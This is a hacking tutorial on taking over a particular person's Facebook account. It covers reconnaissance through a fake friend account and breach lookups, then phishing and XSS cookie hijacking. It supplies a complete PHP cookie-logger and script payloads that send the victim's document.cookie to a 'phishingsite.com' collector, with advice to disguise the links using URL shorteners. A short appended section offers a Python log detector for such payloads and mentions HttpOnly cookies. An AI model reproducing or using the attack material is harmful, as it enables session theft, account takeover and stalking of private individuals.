- Now we are going to talk about "facebook hacking"
- We start by talking about attack types that we CAN'T do:
- Just forget about sqli and malware..
- The easiest and most realistic way to get a user's facebook password is Social Engineering or Phishing.
- And that's what we are going to talk about today.
- So let's break down the Social Engineering steps.
- First off you want to harvest as much information about the target as possible.
- Create a fake Facebook account and add the target as friend and collect all info you need.
- Open a yahoo email and import contacts from Facebook; if you're lucky, his email will leak.
- Use google and maltego to find accounts associated with him.
- If you found any email, look it up on haveibeenpwd.
- If you have not found any password yet, I would go for Phishing.
- If you have not read my report on xss, you need to do that now.
- Use the cookie hijacking as explained in the xss tour
- And who knows, you might be able to find an XSS vuln on Facebook; this you have to find on your own..
- No one will ever share that xss vuln with you
- If you missed my xss writeup on cookie hijack
- Cookie hijacking:
- Put cookie logger script on your webpage and insert it to javascript into xss vulnerable with the cookielogger script address :)
- The rest will script handle
- cookielogger.php
- <*?php
- function GetIP()
- {
- if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))
- $ip = getenv("HTTP_CLIENT_IP");
- else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))
- $ip = getenv("HTTP_X_FORWARDED_FOR");
- else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))
- $ip = getenv("REMOTE_ADDR");
- else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown"))
- $ip = $_SERVER['REMOTE_ADDR'];
- else
- $ip = "unknown";
- return($ip);
- }
- function logData()
- {
- $ipLog="log.txt";
- $cookie = $_SERVER['QUERY_STRING'];
- $register_globals = (bool) ini_get('register_gobals');
- if ($register_globals) $ip = getenv('REMOTE_ADDR');
- else $ip = GetIP();
- $rem_port = $_SERVER['REMOTE_PORT'];
- $user_agent = $_SERVER['HTTP_USER_AGENT'];
- $rqst_method = $_SERVER['METHOD'];
- $rem_host = $_SERVER['REMOTE_HOST'];
- $referer = $_SERVER['HTTP_REFERER'];
- $date=date ("l dS of F Y h:i:s A");
- $log=fopen("$ipLog", "a+");
- if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog))
- fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE: $cookie
- ");
- else
- fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE: $date | COOKIE: $cookie \n\n");
- fclose($log);
- }
- logData();
- ?>
- Make a tlog.txt and put both of them on your webspace and set "chmod 777".
- Inject the following code in your target
- website:
- http://www.site.com/google.php?search=<script>location.href = 'http://phishingsite.com/cookiestealer.php?cookie='+document.cookie;</script>
- <script>location.href = 'http://phishingsite.com/cookiestealer.php?cookie='+document.cookie;</script>
- use url shortener services such as tinyurl.com or bit.ly to 'hide' your injection script from the victim
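
Seen from the defending side, the injection URL above leaves a recognisable trace in the target site's access log: a query parameter that decodes to script markup reading `document.cookie`. The following detector is an added example, not part of the original paste; the log lines are constructed and the function names are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed sample access-log lines (combined log format), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /google.php?search=shoes HTTP/1.1" 200 512',
    '203.0.113.9 - - [01/Jan/2024:10:00:05 +0000] "GET /google.php?search=%3Cscript%3Elocation.href%20%3D%20%27http%3A%2F%2Fphishingsite.com%2Fcookiestealer.php%3Fcookie%3D%27%2Bdocument.cookie%3B%3C%2Fscript%3E HTTP/1.1" 200 640',
    '203.0.113.9 - - [01/Jan/2024:10:00:09 +0000] "GET /google.php?search=%253Cscript%253Ealert(document.cookie)%253C%252Fscript%253E HTTP/1.1" 200 640',
    '198.51.100.4 - - [01/Jan/2024:10:01:00 +0000] "GET /help.php?q=how+to+clear+document.cookie HTTP/1.1" 200 300',
]

REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
SCRIPT_CTX = re.compile(r"<\s*script|on\w+\s*=|javascript:", re.I)
COOKIE_READ = re.compile(r"document\s*\.\s*cookie", re.I)
URL_HOST = re.compile(r"https?://([^/'\"\s<>]+)", re.I)

def fully_decode(value, max_rounds=3):
    """Undo nested percent-encoding (e.g. %253C -> %3C -> <)."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def find_cookie_exfil(log_lines):
    """Flag requests whose parameters carry script markup that reads cookies."""
    findings = []
    for line in log_lines:
        m = REQUEST.search(line)
        if not m:
            continue
        target = urlsplit(m.group(1))
        for name, raw in parse_qsl(target.query, keep_blank_values=True):
            value = fully_decode(raw)
            # Require both signals so plain text mentioning cookies is ignored.
            if SCRIPT_CTX.search(value) and COOKIE_READ.search(value):
                findings.append({
                    "client": line.split()[0],
                    "path": target.path,
                    "param": name,
                    "sends_to": URL_HOST.findall(value),  # off-site collectors
                })
    return findings

if __name__ == "__main__":
    for hit in find_cookie_exfil(SAMPLE_LOG):
        print(hit)
```

Marking the session cookie `HttpOnly` keeps it out of `document.cookie`, so a payload of this shape would not capture it even where the XSS exists.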